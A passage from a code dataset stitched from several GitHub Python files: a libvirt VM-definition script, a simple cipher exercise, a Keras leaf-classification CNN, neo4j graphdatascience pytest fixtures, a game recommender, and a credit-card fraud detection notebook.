'manufacturer'}\nxml_sysinfo_system_manufacturer = ElementTree.SubElement(xml_sysinfo_system, 'entry', sysinfo_system_manufacturer_attr).text = 'KVM'\nsysinfo_system_product_attr = {'name': 'product'}\nxml_sysinfo_system_product = ElementTree.SubElement(xml_sysinfo_system, 'entry', sysinfo_system_product_attr).text = 'libvirt-virt-manager'\nsysinfo_system_version_attr = {'name': 'version'}\nxml_sysinfo_system_version = ElementTree.SubElement(xml_sysinfo_system, 'entry', sysinfo_system_version_attr).text = '0.1-alpha'\nsysinfo_system_serial_attr = {'name': 'serial'}\nxml_sysinfo_system_serial = ElementTree.SubElement(xml_sysinfo_system, 'entry', sysinfo_system_serial_attr).text = final_smbios_data\nxml_sysinfo_chassis = ElementTree.SubElement(xml_sysinfo, 'chassis')\nsysinfo_chassis_manufacturer_attr = {'name': 'manufacturer'}\nxml_sysinfo_chassis_manufacturer = ElementTree.SubElement(xml_sysinfo_chassis, 'entry', sysinfo_chassis_manufacturer_attr).text = 'Dell'\nsysinfo_chassis_product_attr = {'name': 'product'}\nxml_sysinfo_chassis_product = ElementTree.SubElement(xml_sysinfo_chassis, 'entry', sysinfo_chassis_product_attr).text = 'PowerEdge R710'\nsysinfo_chassis_version_attr = {'name': 'version'}\nxml_sysinfo_chassis_version = ElementTree.SubElement(xml_sysinfo_chassis, 'entry', sysinfo_chassis_version_attr).text = '1.0'\nsysinfo_chassis_serial_attr = {'name': 'serial'}\nxml_sysinfo_chassis_serial = 
ElementTree.SubElement(xml_sysinfo_chassis, 'entry', sysinfo_chassis_serial_attr).text = 'H42H32S'\nxml_features = ElementTree.SubElement(xml_domain, 'features')\nxml_features_acpi = ElementTree.SubElement(xml_features, 'acpi')\nxml_features_apic = ElementTree.SubElement(xml_features, 'apic')\ncpu_attr = {'mode': 'host-model'}\nxml_cpu = ElementTree.SubElement(xml_domain, 'cpu', cpu_attr)\ncpu_topology_attr = {'sockets': str(SOCKET_COUNT), 'cores': str(CORE_COUNT), 'threads': str(THREAD_COUNT)}\nxml_cpu_topology = ElementTree.SubElement(xml_cpu, 'topology', cpu_topology_attr)\nclock_attr = {'offset': 'utc'}\nxml_clock = ElementTree.SubElement(xml_domain, 'clock', clock_attr)\nclock_timer_rtc_attr = {'name': 'rtc', 'tickpolicy': 'catchup'}\nxml_clock_timer_rtc = ElementTree.SubElement(xml_clock, 'timer', clock_timer_rtc_attr)\nclock_timer_pit_attr = {'name': 'pit', 'tickpolicy': 'delay'}\nxml_clock_timer_pit = ElementTree.SubElement(xml_clock, 'timer', clock_timer_pit_attr)\nclock_timer_hpet_attr = {'name': 'hpet', 'present': 'no'}\nxml_clock_timer_hpet = ElementTree.SubElement(xml_clock, 'timer', clock_timer_hpet_attr)\nxml_pm = ElementTree.SubElement(xml_domain, 'pm')\npm_suspend_mem_attr = {'enabled': 'no'}\nxml_pm_suspend_mem = ElementTree.SubElement(xml_pm, 'suspend-to-mem', pm_suspend_mem_attr)\npm_suspend_disk_attr = {'enabled': 'no'}\nxml_pm_suspend_disk = ElementTree.SubElement(xml_pm, 'suspend-to-disk', pm_suspend_disk_attr)\nxml_devices = ElementTree.SubElement(xml_domain, 'devices')\n# Do we need to define an emulator to use? Hopefully not.\n# I am not stoked on hardcoding path to the emulator...\n# Putting this in just in case if libvirt just doesn't wanna cooperate at all\n# xml_devices_emulator = ElementTree.SubElement(xml_devices, 'emulator').text = EMULATOR_PATH\ndevices_disk_attr = {'type': 'file', 'device': 'disk'}\nxml_devices_disk = ElementTree.SubElement(xml_devices, 'disk', devices_disk_attr)\ndevices_disk_driver_attr = {'name': 'qemu', 'type': 'qcow2', 'discard': 'unmap'}\nxml_devices_disk_driver = ElementTree.SubElement(xml_devices_disk, 'driver', devices_disk_driver_attr)\ndevices_disk_source_attr = {'file': '{}/{}/{}'.format(DISK_PATH, DOMAIN_NAME, IMAGE_NAME)}\nxml_devices_disk_source = ElementTree.SubElement(xml_devices_disk, 'source', devices_disk_source_attr)\ndevices_disk_target_attr = {'dev': 'sda', 'bus': 'scsi'}\nxml_devices_disk_target = ElementTree.SubElement(xml_devices_disk, 'target', devices_disk_target_attr)\ndevices_controller_scsi_attr = {'type': 'scsi', 'model': 'virtio-scsi'}\nxml_devices_controller_scsi = ElementTree.SubElement(xml_devices, 'controller', devices_controller_scsi_attr)\ndevices_controller_usb_attr = {'type': 'usb', 'model': 'qemu-xhci', 'ports': '15'}\nxml_devices_controller_usb = ElementTree.SubElement(xml_devices, 'controller', devices_controller_usb_attr)\ndevices_interface_attr = {'type': 'network'}\nxml_devices_interface = ElementTree.SubElement(xml_devices, 'interface', devices_interface_attr)\ndevices_interface_source_attr = {'network': 'default'}\nxml_devices_interface_source = ElementTree.SubElement(xml_devices_interface, 'source', devices_interface_source_attr)\ndevices_interface_model_attr = {'type': 'virtio'}\nxml_devices_interface_model = ElementTree.SubElement(xml_devices_interface, 'model', devices_interface_model_attr)\ndevices_console_type_attr = {'type': 'pty'}\nxml_devices_console_type = ElementTree.SubElement(xml_devices, 'console', devices_console_type_attr)\ndevices_channel_attr = {'type': 
'unix'}\nxml_devices_channel = ElementTree.SubElement(xml_devices, 'channel', devices_channel_attr)\ndevices_channel_source_attr = {'mode': 'bind'}\nxml_devices_channel_source = ElementTree.SubElement(xml_devices_channel, 'source', devices_channel_source_attr)\nchannel_target_attr = {'type': 'virtio', 'name': 'org.qemu.guest_agent.0'}\nxml_channel_target = ElementTree.SubElement(xml_devices_channel, 'target', channel_target_attr)\ndevices_input_attr = {'type': 'tablet', 'bus': 'usb'}\ndevices_xml_input = ElementTree.SubElement(xml_devices, 'input', devices_input_attr)\ndevices_graphics_attr = {'type': 'vnc', 'port': str(VNC_PORT), 'listen': VNC_LISTEN_IP}\nxml_devices_graphics = ElementTree.SubElement(xml_devices, 'graphics', devices_graphics_attr)\nxml_devices_video = ElementTree.SubElement(xml_devices, 'video')\ndevices_video_model_attr = {'type': 'qxl'}\nxml_devices_video_model = ElementTree.SubElement(xml_devices_video, 'model', devices_video_model_attr)\ndevices_memballoon_attr = {'model': 'virtio'}\ndevices_xml_memballoon = ElementTree.SubElement(xml_devices, 'memballoon', devices_memballoon_attr)\ndevices_rng_attr = {'model': 'virtio'}\nxml_devices_rng = ElementTree.SubElement(xml_devices, 'rng', devices_rng_attr)\ndevices_rng_backend_attr = {'model': 'random'}\nxml_devices_rng_backend = ElementTree.SubElement(xml_devices_rng, 'backend', devices_rng_backend_attr).text = '/dev/urandom'\n\nxml_str = ElementTree.tostring(xml_domain, 'unicode')\nprint('Generation complete.')\nprint('Defining domain {} at {}'.format(DOMAIN_NAME, client.getHostname()))\ndomain = client.defineXML(xml_str)\n\n\n# Get UUID\n# TODO: write getUUID() code\n# This is fucking broken logic. I hate it. And UUID is already defined up there so this is completely useless\ntry:\n domain_obj = client.lookupByName(DOMAIN_NAME)\n domain_uuid = domain_obj.UUID()\nexcept libvirt.libvirtError:\n print(ERR_DOMAIN_NOT_FOUND.format(DOMAIN_NAME))\n exit(1)\n\n\n# Set SMBIOS data\n# FIXME: can be combined into \"Generate domain XML\" section\n# Absolute cancer.\n# Why I need to do it this way.\n#\n# Also, already done above.\n\n\n# Generate user-data\n# TODO: Create sample helper code to expose user-data\n# ALSO TODO: Move to ruamel.yaml if don't want to use `#cloud-config` line hack\n# Cue the world's possibly drunkest and most hacky way to generate YAML.\n\n#cloud-config\n# name: chong601\n# password: chong601\n# chpasswd: {expire: False}\n# ssh_pwauth: True\n# hostname: vm-ubuntu-focal-lxd-cluster-3\n# timezone: \"Asia/Kuala_Lumpur\"\n# package_update: true\n# package_upgrade: true\n# package_reboot_if_required: true\n# packages:\n# - qemu - guest - agent\n# - haveged\n# power_state:\n# delay: now\n# mode: reboot\n# message: \"Cloud-config for vm-ubuntu-focal-lxd-cluster-3 is completed. 
Restarting...\"\n# timeout: 15\n# condition: True\n# system_info:\n# default_user:\n\n# Generate meta-data\n# TODO: Create sample helper code to expose user-data\n\n# Generate network data\n# TODO: Figure out how to present networking data on nocloud-net Cloud-Init\n\n# Store in DB\n# TODO: long long time later\n\n# Start domain\n# TODO: write domain lifecycle code\nprint('Starting domain {} at {}'.format(DOMAIN_NAME, client.getHostname()))\ndomain.create()\nprint('Domain {} is started at {}'.format(DOMAIN_NAME, client.getHostname()))","repo_name":"chong601/NoCloud","sub_path":"nocloud/domain_instance/create_vm.py","file_name":"create_vm.py","file_ext":"py","file_size_in_byte":17138,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"94"} +{"seq_id":"10452532887","text":"\n\ndef code_letter_atbash(c):\n if 'a' <= c and c <= 'z':\n result = chr(ord('z')-(ord(c)-ord('a')))\n elif 'A' <= c and c <= 'Z':\n result = chr(ord('Z')-(ord(c)-ord('A')))\n else:\n result = c\n return result\n\ndef coder_atbash(message):\n result = ''\n for c in message:\n result = result + code_letter_atbash(c)\n return result\n\ndef decoder_atbash(message):\n return coder_atbash(message)\n\ndef decoder_transposition(message):\n result = ''\n med = len(message)//2 + len(message)%2\n for i in range(med-1):\n result = result + message[i]+message[med+i]\n result = result + message[med-1]\n if len(message)%2 ==0:\n result = result + message[len(message)-1]\n return result\n\ndef coder_transposition(message):\n result = ''\n for i in range(0,len(message),2):\n result = result + message[i]\n for i in range(1,len(message),2):\n result = result + message[i]\n return result\n","repo_name":"LuisLlana/prpa","sub_path":"practicas/p2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"69832552310","text":"# leaf classification (1D CNN)\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\n\n# read the test and training data\ntrain = pd.read_csv('datasets/leaf-classification/train.csv')\ntest = pd.read_csv('datasets/leaf-classification/test.csv')\n\n# determine and label the classes\nlabel_encoder = LabelEncoder().fit(train.species)\nlabels = label_encoder.transform(train.species)\nclasses = list(label_encoder.classes_)\n\n# prepare the data; set the number of features and classes\ntrain = train.drop(['id', 'species'], axis=1)\ntest = test.drop(['id'], axis=1)\nnb_features = 192\nnb_classes = len(classes)\n\n\n# standardize the training data\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler().fit(train.values)\ntrain = scaler.transform(train.values)\n\n# split the training data into training and validation sets\nfrom sklearn.model_selection import train_test_split\nX_train, X_valid, y_train, y_valid = train_test_split(train, labels, test_size=0.2)\n\n# one-hot encode the labels\n#from tensorflow.keras.utils import to_categorical\nfrom keras.utils import to_categorical\ny_train = to_categorical(y_train)\ny_valid = to_categorical(y_valid)\n\n# reshape the input data\nX_train = np.array(X_train).reshape(-1, nb_features, 1)\nX_valid = np.array(X_valid).reshape(-1, nb_features, 1)\n\n# build the 1D CNN model\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv1D, Flatten, MaxPooling1D, Dropout, 
Activation\n\nmodel=Sequential()\nmodel.add(Conv1D(512,1,input_shape=(nb_features,1)))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling1D(2))\nmodel.add(Conv1D(256,1))\nmodel.add(MaxPooling1D(2))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(2048,activation=\"relu\"))\nmodel.add(Dense(1024,activation=\"relu\"))\nmodel.add(Dense(nb_classes,activation=\"softmax\"))\nmodel.summary()\n\n#Compile the network\nmodel.compile(loss=\"categorical_crossentropy\",optimizer=\"adam\",metrics=[\"accuracy\"])\n\n#Train the model\nmodel.fit(X_train,y_train,epochs=15,validation_data=(X_valid,y_valid))\n\n\n#Report the average values\nprint((\"Average training loss:\",np.mean(model.history.history[\"loss\"])))\nprint((\"Average training accuracy:\",np.mean(model.history.history[\"accuracy\"])))\nprint((\"Average validation loss:\",np.mean(model.history.history[\"val_loss\"])))\nprint((\"Average validation accuracy:\",np.mean(model.history.history[\"val_accuracy\"])))\n\n#Plot the values\nimport matplotlib.pyplot as plt\nfig,(ax1,ax2)=plt.subplots(2,1,figsize=(15,15))\nax1.plot(model.history.history[\"loss\"],color=\"g\",label=\"Training loss\")\nax1.plot(model.history.history[\"val_loss\"],color=\"y\",label=\"Validation loss\")\nax1.set_xticks(np.arange(20,100,20))\nax2.plot(model.history.history[\"accuracy\"],color=\"b\",label=\"Training accuracy\")\nax2.plot(model.history.history[\"val_accuracy\"],color=\"r\",label=\"Validation accuracy\")\nax2.set_xticks(np.arange(20,100,20))\nplt.legend()\nplt.show()\n\n\n# Find the F1 score, precision, sensitivity and specificity values\n\n#F1 score\nfrom sklearn.metrics import f1_score\ny_pred = model.predict(X_valid)\ny_pred = np.argmax(y_pred, axis=1)\ny_valid = np.argmax(y_valid, axis=1)\nf1 = f1_score(y_valid, y_pred, average='macro')\nprint('F1 score: %f' % f1)\n\n#precision\nfrom sklearn.metrics import precision_score\nprecision = precision_score(y_valid, y_pred, average='macro')\nprint('Precision: %f' % precision)\n\n#recall (sensitivity)\nfrom sklearn.metrics import recall_score\nrecall = recall_score(y_valid, y_pred, average='macro')\nprint('Recall: %f' % recall)\n\n#specificity\nfrom sklearn.metrics import confusion_matrix\n# NOTE: this 4-way unpack only works for binary classification; with the\n# multi-class labels here confusion_matrix().ravel() has n_classes**2 entries\ntn, fp, fn, tp = confusion_matrix(y_valid, y_pred).ravel()\nspecificity = tn / (tn+fp)\nprint('Specificity: %f' % specificity)\n\n\n\n\n\n","repo_name":"ilker-yilmaz/artificial-intelligence-lab","sub_path":"week-8.py","file_name":"week-8.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"3045448365","text":"import os\nfrom pathlib import Path\nfrom typing import Any, Generator, Optional\n\nimport pytest\nfrom neo4j import Driver, GraphDatabase\n\nfrom graphdatascience.graph_data_science import GraphDataScience\nfrom graphdatascience.query_runner.aura_db_arrow_query_runner import (\n AuraDbConnectionInfo,\n)\nfrom graphdatascience.query_runner.neo4j_query_runner import Neo4jQueryRunner\nfrom graphdatascience.server_version.server_version import ServerVersion\n\nURI = os.environ.get(\"NEO4J_URI\", \"bolt://localhost:7687\")\nURI_TLS = os.environ.get(\"NEO4J_URI\", \"bolt+ssc://localhost:7687\")\n\nAUTH = (\"neo4j\", \"password\")\nif os.environ.get(\"NEO4J_USER\"):\n AUTH = (\n os.environ.get(\"NEO4J_USER\", \"DUMMY\"),\n os.environ.get(\"NEO4J_PASSWORD\", \"neo4j\"),\n )\n\nDB = os.environ.get(\"NEO4J_DB\", \"neo4j\")\n\nAURA_DB_URI = 
os.environ.get(\"NEO4J_AURA_DB_URI\", \"bolt://localhost:7689\")\nAURA_DB_AUTH = (\"neo4j\", \"password\")\n\n\n@pytest.fixture(scope=\"package\")\ndef neo4j_driver() -> Generator[Driver, None, None]:\n driver = GraphDatabase.driver(URI, auth=AUTH)\n\n yield driver\n\n driver.close()\n\n\n@pytest.fixture(scope=\"package\")\ndef runner(neo4j_driver: Driver) -> Generator[Neo4jQueryRunner, None, None]:\n _runner = Neo4jQueryRunner(neo4j_driver)\n _runner.set_database(DB)\n\n yield _runner\n\n _runner.close()\n\n\n@pytest.fixture(scope=\"package\", autouse=False)\ndef auradb_runner() -> Generator[Neo4jQueryRunner, None, None]:\n driver = GraphDatabase.driver(AURA_DB_URI, auth=AURA_DB_AUTH)\n\n _runner = Neo4jQueryRunner(driver)\n _runner.set_database(DB)\n\n yield _runner\n\n driver.close()\n\n\n@pytest.fixture(scope=\"package\")\ndef gds() -> Generator[GraphDataScience, None, None]:\n _gds = GraphDataScience(URI, auth=AUTH)\n _gds.set_database(DB)\n\n yield _gds\n\n _gds.close()\n\n\n@pytest.fixture(scope=\"package\")\ndef gds_with_tls() -> Generator[GraphDataScience, None, None]:\n integration_test_dir = Path(__file__).resolve().parent\n cert = os.path.join(integration_test_dir, \"resources\", \"arrow-flight-gds-test.crt\")\n\n with open(cert, \"rb\") as f:\n root_ca = f.read()\n\n _gds = GraphDataScience(\n URI_TLS,\n auth=AUTH,\n arrow=True,\n arrow_disable_server_verification=True,\n arrow_tls_root_certs=root_ca,\n )\n _gds.set_database(DB)\n\n yield _gds\n\n _gds.close()\n\n\n@pytest.fixture(scope=\"package\")\ndef gds_without_arrow() -> Generator[GraphDataScience, None, None]:\n _gds = GraphDataScience(URI, auth=AUTH, arrow=False)\n _gds.set_database(DB)\n\n yield _gds\n\n _gds.close()\n\n\n@pytest.fixture(scope=\"package\", autouse=False)\ndef gds_with_cloud_setup(request: pytest.FixtureRequest) -> Optional[Generator[GraphDataScience, None, None]]:\n if \"cloud_architecture\" not in request.keywords:\n _gds = GraphDataScience(\n URI, auth=AUTH, arrow=True, aura_db_connection_info=AuraDbConnectionInfo(AURA_DB_URI, AURA_DB_AUTH)\n )\n _gds.set_database(DB)\n\n yield _gds\n\n _gds.close()\n return None\n\n\n@pytest.fixture(autouse=True)\ndef clean_up(gds: GraphDataScience) -> Generator[None, None, None]:\n yield\n\n res = gds.graph.list()\n for graph_name in res[\"graphName\"]:\n gds.graph.get(graph_name).drop(failIfMissing=True)\n\n res = gds.pipeline.list() if gds.server_version() >= ServerVersion(2, 5, 0) else gds.beta.pipeline.list()\n for pipeline_name in res[\"pipelineName\"]:\n gds.pipeline.get(pipeline_name).drop(failIfMissing=True)\n\n if gds.server_version() >= ServerVersion(2, 5, 0):\n model_names = gds.model.list()[\"modelName\"]\n else:\n model_names = gds.beta.model.list()[\"modelInfo\"].apply(func=lambda row: row[\"modelName\"])\n\n for model_name in model_names:\n model = gds.model.get(model_name)\n if model.stored():\n if gds.server_version() >= ServerVersion(2, 5, 0):\n gds.model.delete(model)\n else:\n gds.alpha.model.delete(model)\n if model.exists():\n model.drop(failIfMissing=True)\n\n gds.run_cypher(\"MATCH (n) DETACH DELETE (n)\")\n\n\ndef pytest_collection_modifyitems(config: Any, items: Any) -> None:\n if config.getoption(\"--target-aura\"):\n skip_on_aura = pytest.mark.skip(reason=\"skipping since targeting AuraDS\")\n for item in items:\n if \"skip_on_aura\" in item.keywords:\n item.add_marker(skip_on_aura)\n else:\n skip_not_aura = pytest.mark.skip(reason=\"skipping since not targeting AuraDS\")\n for item in items:\n if \"only_on_aura\" in item.keywords:\n 
item.add_marker(skip_not_aura)\n\n if not config.getoption(\"--include-ogb\"):\n skip_ogb_only = pytest.mark.skip(reason=\"need --include-ogb option to run\")\n for item in items:\n if \"ogb\" in item.keywords:\n item.add_marker(skip_ogb_only)\n\n if not config.getoption(\"--include-enterprise\"):\n skip_enterprise = pytest.mark.skip(reason=\"need --include-enterprise option to run\")\n for item in items:\n if \"enterprise\" in item.keywords:\n item.add_marker(skip_enterprise)\n\n # `encrypted` includes marked tests and excludes everything else\n if config.getoption(\"--encrypted-only\"):\n skip_encrypted_only = pytest.mark.skip(reason=\"not marked as `encrypted_only`\")\n for item in items:\n if \"encrypted_only\" not in item.keywords:\n item.add_marker(skip_encrypted_only)\n else:\n skip_encrypted_only = pytest.mark.skip(reason=\"need --encrypted-only option to run\")\n for item in items:\n if \"encrypted_only\" in item.keywords:\n item.add_marker(skip_encrypted_only)\n\n if not config.getoption(\"--include-model-store-location\"):\n skip_stored_models = pytest.mark.skip(reason=\"need --include-model-store-location option to run\")\n for item in items:\n if \"model_store_location\" in item.keywords:\n item.add_marker(skip_stored_models)\n\n # `cloud-architecture` includes marked tests and excludes everything else\n if config.getoption(\"--include-cloud-architecture\"):\n skip_on_prem = pytest.mark.skip(reason=\"not marked as `cloud-architecture`\")\n for item in items:\n if \"cloud_architecture\" not in item.keywords:\n item.add_marker(skip_on_prem)\n else:\n skip_cloud_architecture = pytest.mark.skip(reason=\"need --include-cloud-architecture option to run\")\n for item in items:\n if \"cloud_architecture\" in item.keywords:\n item.add_marker(skip_cloud_architecture)\n\n gds = GraphDataScience(URI, auth=AUTH)\n\n try:\n server_version = gds._server_version\n except Exception as e:\n print(\"Could not derive GDS library server version\")\n gds.close()\n raise e\n\n gds.close()\n\n skip_incompatible_versions = pytest.mark.skip(reason=f\"incompatible with GDS server version {server_version}\")\n\n for item in items:\n for mark in item.iter_markers(name=\"compatible_with\"):\n kwargs = mark.kwargs\n\n if \"min_inclusive\" in kwargs and kwargs[\"min_inclusive\"] > server_version:\n item.add_marker(skip_incompatible_versions)\n continue\n\n if \"max_exclusive\" in kwargs and kwargs[\"max_exclusive\"] <= server_version:\n item.add_marker(skip_incompatible_versions)\n","repo_name":"neo4j/graph-data-science-client","sub_path":"graphdatascience/tests/integration/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"94"} +{"seq_id":"27260204206","text":"import datetime\nimport itertools\nfrom collections import OrderedDict\nfrom math import ceil\n\n\nclass Recommender:\n\n def __init__(self):\n self.games = []\n self.user_activity = []\n self.n = 0\n\n def recommend(self, user_activity, games, n):\n self.games = games\n self.user_activity = user_activity\n self.n = n\n\n game_scores = self.__calculate_scores_for_games()\n recommendations = self.__choose_n_best_games(game_scores)\n\n return recommendations\n\n def __choose_n_best_games(self, game_scores):\n sorted_game_scores = sorted(game_scores.items(), key=lambda x: x[1], reverse=True)\n return [score[0] for score in sorted_game_scores[:self.n]]\n\n def __calculate_scores_for_games(self):\n game_scores = {}\n for game in 
self.games:\n max_score = 0\n for activity in self.user_activity:\n user_activity_game = self.__get_game_by_id(activity.game_id)\n if user_activity_game.id == game.id:\n continue\n similarity = self.__get_genre_similarity(game, user_activity_game)\n page_visit_score = self.__get_page_visit_scores(activity)\n delta = self.__get_delta(activity, user_activity_game)\n score = (similarity + page_visit_score) * delta\n max_score += score\n game_scores[game] = max_score\n return game_scores\n\n def __get_delta(self, activity, user_activity_game):\n today = datetime.datetime.today()\n days_since_last_activity = (today - activity.last_update).total_seconds() / 60 / 60 / 24\n positive_proportion = \\\n user_activity_game.num_of_positive_reviews / (user_activity_game.num_of_positive_reviews + user_activity_game.num_of_negative_reviews)\n return (1/(1+days_since_last_activity) + positive_proportion)/2\n\n def __get_page_visit_scores(self, activity):\n page_visit_score = activity.page_entries + activity.steam_store_visits * 2\n return page_visit_score\n\n def __get_genre_similarity(self, game1, game2):\n similarity = 0\n for genre1 in game1.genres:\n for genre2 in game2.genres:\n if genre1.name == genre2.name:\n similarity += 1\n return similarity/float(len(game1.genres) + len(game2.genres))\n\n def __get_game_by_id(self, id):\n for game in self.games:\n if game.id == id:\n return game\n return None\n","repo_name":"LEFTazs/recommender-algorithm-steam","sub_path":"recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39234101752","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ### First-pass data preparation and model train/predict/evaluate\n# \n# ** Load the data **\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ncard_df = pd.read_csv('C:/jeon/creditcard.csv')\ncard_df.head(3)\n\nprint(card_df.info()) #no null values. Only the 'Class' column is int, the rest are float\ntest = card_df.describe() #looking at the 'Class' column, its values are probably just 0 and 1!\nprint(card_df['Class'].value_counts()) #confirmed! +and the rows with 1 are extremely rare (expected, since those are the fraud cases)\n\n# In[2]:\n\n\nprint(card_df.shape)\n\n\n# ** Keep the original DataFrame and return a copy for preprocessing **\n\n# In[3]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n# Copy the input DataFrame, drop only the Time column, and return the copy\ndef get_preprocessed_df(df=None):\n df_copy = df.copy() #the copy\n df_copy.drop('Time', axis=1, inplace=True) #we are not told exactly what it holds (customer data), but it just keeps increasing and looks meaningless, so simply drop it.\n return df_copy\n\n\n# ** Create a function that returns the train and test sets; call it once preprocessing is done **\n\n# In[4]:\n\n\n# Function that returns the train and test sets after preprocessing.\ndef get_train_test_dataset(df=None):\n # Get a preprocessed copy of the input DataFrame\n df_copy = get_preprocessed_df(df)\n \n # The last column of the DataFrame is the label, the rest are features\n X_features = df_copy.iloc[:, :-1]\n y_target = df_copy.iloc[:, -1]\n \n # Split into train and test sets with train_test_split(); 
stratify=y_target makes the split stratified\n X_train, X_test, y_train, y_test = train_test_split(X_features, y_target, test_size=0.3, random_state=0, stratify=y_target)\n \n # Return the train and test sets\n return X_train, X_test, y_train, y_test\n\nX_train, X_test, y_train, y_test = get_train_test_dataset(card_df)\n\n\n# In[5]:\n\n\nprint('Label value ratio of the training data')\nprint(y_train.value_counts()/y_train.shape[0] * 100)\nprint('Label value ratio of the test data')\nprint(y_test.value_counts()/y_test.shape[0] * 100)\n\n\n# In[6]:\n\n\nfrom sklearn.metrics import confusion_matrix, accuracy_score, precision_score, recall_score, f1_score\nfrom sklearn.metrics import roc_auc_score\n\n# Updated get_clf_eval() function \ndef get_clf_eval(y_test, pred=None, pred_proba=None):\n confusion = confusion_matrix( y_test, pred)\n accuracy = accuracy_score(y_test , pred)\n precision = precision_score(y_test , pred)\n recall = recall_score(y_test , pred)\n f1 = f1_score(y_test,pred)\n # Add ROC-AUC \n roc_auc = roc_auc_score(y_test, pred_proba)\n print('Confusion matrix')\n print(confusion)\n '''\n [[85282 13]\n [ 56 92]]\n accuracy: 0.9992, precision: 0.8762, recall: 0.6216, F1: 0.7273, AUC:0.9582\n Since this is card fraud, recall must not be low. FN (an actual fraud predicted as Negative) is the failure we cannot afford!!\n '''\n # Also print ROC-AUC\n print('accuracy: {0:.4f}, precision: {1:.4f}, recall: {2:.4f}, F1: {3:.4f}, AUC:{4:.4f}'.format(accuracy, precision, recall, f1, roc_auc))\n\n\n# In[7]:\n\n\nfrom sklearn.linear_model import LogisticRegression\n\nlr_clf = LogisticRegression()\n\nlr_clf.fit(X_train, y_train)\n\nlr_pred = lr_clf.predict(X_test)\nlr_pred_proba = lr_clf.predict_proba(X_test)[:, 1]\n\n# Evaluate with the get_clf_eval() function used in chapter 3. \nget_clf_eval(y_test, lr_pred, lr_pred_proba)\n\n\n# ** We will train/predict/evaluate a model after every feature-engineering step, so create a helper function for it ** \n\n# In[8]:\n\n\n# Takes a scikit-learn estimator object plus train/test sets and runs train/predict/evaluate.\ndef get_model_train_eval(model, ftr_train=None, ftr_test=None, tgt_train=None, tgt_test=None):\n model.fit(ftr_train, tgt_train)\n pred = model.predict(ftr_test)\n pred_proba = model.predict_proba(ftr_test)[:, 1]\n get_clf_eval(tgt_test, pred, pred_proba)\n '''\n Running LightGBM below shows this confusion matrix:\n [[85290 5]\n [ 36 112]]\n accuracy: 0.9995, precision: 0.9573, recall: 0.7568, F1: 0.8453, AUC:0.9790\n Recall jumps up, and precision improves as well. \n '''\n\n\n# ** LightGBM train/predict/evaluate.**\n# \n# (With boost_from_average=True, recall and ROC-AUC degrade badly when the label values are extremely imbalanced.) \n# This behaviour appears in LightGBM 2.1.0 and later \n\n# In[9]:\n\n\nfrom lightgbm import LGBMClassifier\n\nlgbm_clf = LGBMClassifier(n_estimators=1000, num_leaves=64, n_jobs=-1, boost_from_average=False) #n_jobs=-1: use every CPU and run the estimator at once~ the machine slows down but training gets faster!\nget_model_train_eval(lgbm_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\n\n# ### Train/predict/evaluate after transforming the distribution of an important feature\n# \n\n# ** Check the distribution of the important feature **\n\n# In[10]:\n\n\nimport seaborn as sns\n\nplt.figure(figsize=(8, 4))\nplt.xticks(range(0, 30000, 1000), rotation=60) #rotation=60 : tilt the x-axis tick labels by 60 degrees\nsns.distplot(card_df['Amount']) #Amount : credit-card payment amount. Histogram of fraud occurrences per payment amount (distplot: frequency distribution)\n #kde=True by default. --> draws the density curve of the histogram (as continuous values). This is money, so treat it as continuous rather than discrete. \n #discrete values : probability mass function\n #continuous values : integrate! (dx : an extremely thin slice of x) -> probability density function\n# ** Transform the Amount feature with StandardScaler inside the separate preprocessing function **\n\n# In[11]:\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n# Modified so the Amount feature is transformed to a standard-normal scale with scikit-learn's StandardScaler. 
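\n# (Editor's illustrative aside, not from the original notebook: StandardScaler\n# rescales a column to zero mean and unit variance, e.g. fit_transform on\n# [[1.], [2.], [3.]] returns roughly [[-1.2247], [0.], [1.2247]].)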
\ndef get_preprocessed_df(df=None):\n df_copy = df.copy()\n scaler = StandardScaler()\n amount_n = scaler.fit_transform(df_copy['Amount'].values.reshape(-1, 1)) #fit_transform() needs a vertical 2-D array, not a horizontal series (1-D data), hence the reshape. \n \n # Rename the transformed Amount to Amount_Scaled and insert it as the first column of the DataFrame\n df_copy.insert(0, 'Amount_Scaled', amount_n) #cf. append can only attach at the very end. \n \n # Drop the original Time and Amount features\n df_copy.drop(['Time','Amount'], axis=1, inplace=True) #Time was meaningless from the start and the original Amount is no longer needed, so drop both\n return df_copy\n\n\n# ** Logistic regression and LightGBM train/predict/evaluate after the StandardScaler transform **\n\n# In[12]:\n\n\n# Run logistic regression and LightGBM after normalizing Amount. \nX_train, X_test, y_train, y_test = get_train_test_dataset(card_df)\n\nprint('### Logistic regression prediction performance ###')\nlr_clf = LogisticRegression()\nget_model_train_eval(lr_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\nprint('### LightGBM prediction performance ###')\nlgbm_clf = LGBMClassifier(n_estimators=1000, num_leaves=64, n_jobs=-1, boost_from_average=False)\nget_model_train_eval(lgbm_clf, ftr_train=X_train, ftr_test=X_test, tgt_train=y_train, tgt_test=y_test)\n\n\n# ** Log-transform Amount **\n\n# In[13]:\n\n\ndef 